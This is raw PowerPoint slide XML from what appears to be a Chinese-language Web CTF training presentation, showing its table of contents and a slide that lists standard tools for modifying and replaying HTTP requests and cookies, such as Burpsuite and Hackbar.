                  <a:gd name="adj" fmla="val 4879"/>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17307F"/>
                  </a:solidFill>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Arial" panose="020B0604020202020204"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="Arial" panose="020B0604020202020204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="12" name="Group 5"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4039318" y="1094331"/>
              <a:ext cx="3347336" cy="530915"/>
              <a:chOff x="1598044" y="1315972"/>
              <a:chExt cx="4463114" cy="707886"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="TextBox 6"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1598044" y="1315972"/>
                <a:ext cx="655949" cy="707886"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr">
                <a:no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5400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:srgbClr val="17307F"/>
                    </a:solidFill>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Arial" panose="020B0604020202020204"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:cs typeface="+mn-ea"/>
                    <a:sym typeface="Arial" panose="020B0604020202020204"/>
                  </a:rPr>
                  <a:t>01</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="15" name="TextBox 8"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2098584" y="1529264"/>
                <a:ext cx="3962574" cy="381987"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="480000" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-Hans" sz="2800" b="1" kern="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="17307F"/>
                    </a:solidFill>
                    <a:latin typeface="Arial" panose="020B0604020202020204"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:cs typeface="+mn-ea"/>
                    <a:sym typeface="Arial" panose="020B0604020202020204"/>
                  </a:rPr>
                  <a:t>Web</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-Hans" altLang="en-US" sz="2800" b="1" kern="0">
                    <a:solidFill>
                      <a:srgbClr val="17307F"/>
                    </a:solidFill>
                    <a:latin typeface="Arial" panose="020B0604020202020204"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:cs typeface="+mn-ea"/>
                    <a:sym typeface="Arial" panose="020B0604020202020204"/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-Hans" sz="2800" b="1" kern="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="17307F"/>
                    </a:solidFill>
                    <a:latin typeface="Arial" panose="020B0604020202020204"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:cs typeface="+mn-ea"/>
                    <a:sym typeface="Arial" panose="020B0604020202020204"/>
                  </a:rPr>
                  <a:t>CTF</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-Hans" altLang="en-US" sz="2800" b="1" kern="0">
                    <a:solidFill>
                      <a:srgbClr val="17307F"/>
                    </a:solidFill>
                    <a:latin typeface="Arial" panose="020B0604020202020204"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:cs typeface="+mn-ea"/>
                    <a:sym typeface="Arial" panose="020B0604020202020204"/>
                  </a:rPr>
                  <a:t>介绍</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="17307F"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="Arial" panose="020B0604020202020204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="组合 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3766432" y="2600581"/>
            <a:ext cx="4755061" cy="988629"/>
            <a:chOff x="3974544" y="1846512"/>
            <a:chExt cx="3566296" cy="741472"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="20" name="组合 19"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3974544" y="1846512"/>
              <a:ext cx="741472" cy="741472"/>
              <a:chOff x="3059832" y="3339719"/>
              <a:chExt cx="3607562" cy="3607562"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="26" name="椭圆 25"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3059832" y="3339719"/>
                <a:ext cx="3607562" cy="3607562"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">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17307F"/>
                  </a:solidFill>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Arial" panose="020B0604020202020204"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="Arial" panose="020B0604020202020204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="同心圆 69"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3168202" y="3448089"/>
                <a:ext cx="3390826" cy="3390826"/>
              </a:xfrm>
              <a:prstGeom prst="donut">
                <a:avLst>
                  <a:gd name="adj" fmla="val 4879"/>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17307F"/>
                  </a:solidFill>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Arial" panose="020B0604020202020204"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="Arial" panose="020B0604020202020204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="21" name="Group 10"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4018571" y="1932357"/>
              <a:ext cx="3522269" cy="530915"/>
              <a:chOff x="1570382" y="2684322"/>
              <a:chExt cx="4696359" cy="707886"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="22" name="TextBox 11"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1570382" y="2684322"/>
                <a:ext cx="718466" cy="707886"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr">
                <a:no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5400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:srgbClr val="17307F"/>
                    </a:solidFill>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Arial" panose="020B0604020202020204"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:cs typeface="+mn-ea"/>
                    <a:sym typeface="Arial" panose="020B0604020202020204"/>
                  </a:rPr>
                  <a:t>02</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="24" name="TextBox 13"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2066367" y="2861973"/>
                <a:ext cx="4200374" cy="408422"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="480000" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-Hans" sz="2800" b="1" kern="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="17307F"/>
                    </a:solidFill>
                    <a:latin typeface="Arial" panose="020B0604020202020204"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:cs typeface="+mn-ea"/>
                    <a:sym typeface="Arial" panose="020B0604020202020204"/>
                  </a:rPr>
                  <a:t>Web</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-Hans" altLang="en-US" sz="2800" b="1" kern="0">
                    <a:solidFill>
                      <a:srgbClr val="17307F"/>
                    </a:solidFill>
                    <a:latin typeface="Arial" panose="020B0604020202020204"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:cs typeface="+mn-ea"/>
                    <a:sym typeface="Arial" panose="020B0604020202020204"/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-Hans" sz="2800" b="1" kern="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="17307F"/>
                    </a:solidFill>
                    <a:latin typeface="Arial" panose="020B0604020202020204"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:cs typeface="+mn-ea"/>
                    <a:sym typeface="Arial" panose="020B0604020202020204"/>
                  </a:rPr>
                  <a:t>CTF</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-Hans" altLang="en-US" sz="2800" b="1" kern="0">
                    <a:solidFill>
                      <a:srgbClr val="17307F"/>
                    </a:solidFill>
                    <a:latin typeface="Arial" panose="020B0604020202020204"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:cs typeface="+mn-ea"/>
                    <a:sym typeface="Arial" panose="020B0604020202020204"/>
                  </a:rPr>
                  <a:t> 中的</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-Hans" sz="2800" b="1" kern="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="17307F"/>
                    </a:solidFill>
                    <a:latin typeface="Arial" panose="020B0604020202020204"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:cs typeface="+mn-ea"/>
                    <a:sym typeface="Arial" panose="020B0604020202020204"/>
                  </a:rPr>
                  <a:t>trick</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="17307F"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="Arial" panose="020B0604020202020204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="组合 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3705108" y="4152614"/>
            <a:ext cx="4637183" cy="988629"/>
            <a:chOff x="3974544" y="2684388"/>
            <a:chExt cx="3477888" cy="741472"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="29" name="组合 28"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3974544" y="2684388"/>
              <a:ext cx="741472" cy="741472"/>
              <a:chOff x="3059832" y="3339719"/>
              <a:chExt cx="3607562" cy="3607562"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35" name="椭圆 34"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3059832" y="3339719"/>
                <a:ext cx="3607562" cy="3607562"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">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17307F"/>
                  </a:solidFill>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Arial" panose="020B0604020202020204"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="Arial" panose="020B0604020202020204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="同心圆 69"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3168202" y="3448089"/>
                <a:ext cx="3390826" cy="3390826"/>
              </a:xfrm>
              <a:prstGeom prst="donut">
                <a:avLst>
                  <a:gd name="adj" fmla="val 4879"/>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17307F"/>
                  </a:solidFill>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Arial" panose="020B0604020202020204"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="Arial" panose="020B0604020202020204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="30" name="Group 15"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4068250" y="2760788"/>
              <a:ext cx="3384182" cy="591689"/>
              <a:chOff x="1636619" y="4039882"/>
              <a:chExt cx="4512243" cy="788918"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="TextBox 16"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1636619" y="4039882"/>
                <a:ext cx="732893" cy="707886"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr">
                <a:no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5400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:srgbClr val="17307F"/>
                    </a:solidFill>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Arial" panose="020B0604020202020204"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:cs typeface="+mn-ea"/>
                    <a:sym typeface="Arial" panose="020B0604020202020204"/>
                  </a:rPr>
                  <a:t>03</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="32" name="Group 17"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="2185207" y="4375861"/>
                <a:ext cx="3963655" cy="452939"/>
                <a:chOff x="4062674" y="814702"/>
                <a:chExt cx="3963655" cy="452939"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="33" name="TextBox 18"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4062674" y="814702"/>
                  <a:ext cx="3962574" cy="242864"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" lIns="480000" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
                  <a:noAutofit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr lvl="0">
                    <a:defRPr/>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="en-US" altLang="zh-Hans" sz="2800" b="1" kern="0" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="17307F"/>
                      </a:solidFill>
                      <a:latin typeface="Arial" panose="020B0604020202020204"/>
                      <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                      <a:cs typeface="+mn-ea"/>
                      <a:sym typeface="Arial" panose="020B0604020202020204"/>
                    </a:rPr>
                    <a:t>Web</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="zh-Hans" altLang="en-US" sz="2800" b="1" kern="0">
                      <a:solidFill>
                        <a:srgbClr val="17307F"/>
                      </a:solidFill>
                      <a:latin typeface="Arial" panose="020B0604020202020204"/>
                      <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                      <a:cs typeface="+mn-ea"/>
                      <a:sym typeface="Arial" panose="020B0604020202020204"/>
                    </a:rPr>
                    <a:t> </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" altLang="zh-Hans" sz="2800" b="1" kern="0" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="17307F"/>
                      </a:solidFill>
                      <a:latin typeface="Arial" panose="020B0604020202020204"/>
                      <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                      <a:cs typeface="+mn-ea"/>
                      <a:sym typeface="Arial" panose="020B0604020202020204"/>
                    </a:rPr>
                    <a:t>CTF</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="zh-Hans" altLang="en-US" sz="2800" b="1" kern="0">
                      <a:solidFill>
                        <a:srgbClr val="17307F"/>
                      </a:solidFill>
                      <a:latin typeface="Arial" panose="020B0604020202020204"/>
                      <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                      <a:cs typeface="+mn-ea"/>
                      <a:sym typeface="Arial" panose="020B0604020202020204"/>
                    </a:rPr>
                    <a:t>中的常用工具</a:t>
                  </a:r>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" kern="0">
                    <a:solidFill>
                      <a:srgbClr val="17307F"/>
                    </a:solidFill>
                    <a:latin typeface="Arial" panose="020B0604020202020204"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:cs typeface="+mn-ea"/>
                    <a:sym typeface="Arial" panose="020B0604020202020204"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="34" name="TextBox 19"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4063755" y="947273"/>
                  <a:ext cx="3962574" cy="320368"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
              <p:txBody>
                <a:bodyPr vert="horz" wrap="square" lIns="480000" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                  <a:normAutofit/>
                </a:bodyP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17307F"/>
                    </a:solidFill>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Arial" panose="020B0604020202020204"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:cs typeface="+mn-ea"/>
                    <a:sym typeface="Arial" panose="020B0604020202020204"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="矩形 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699152" y="469055"/>
            <a:ext cx="2202931" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1245235">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6000" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="17307F"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>目 录</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Rectangle 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="885645" y="1394393"/>
            <a:ext cx="1829944"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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="17307F"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>CATALOG</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="0" kern="0">
              <a:solidFill>
                <a:srgbClr val="17307F"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="361087192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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="15" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16" presetID="2" presetClass="entr" presetSubtype="2"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1+#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2"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2"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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29"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4480560" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3200" b="1"/>
              <a:t>请求修改、重放</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA38ECBD-C0CB-A94B-BDE2-67632D12BA43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="1810265"/>
            <a:ext cx="8945880" cy="2422266"/>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600">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求头：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Modify Headers for Google Chrome</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2600" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2600">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求包：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2600">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2600">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>开发者工具、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Hackbar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2600">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>EditThisCookie</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2600" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
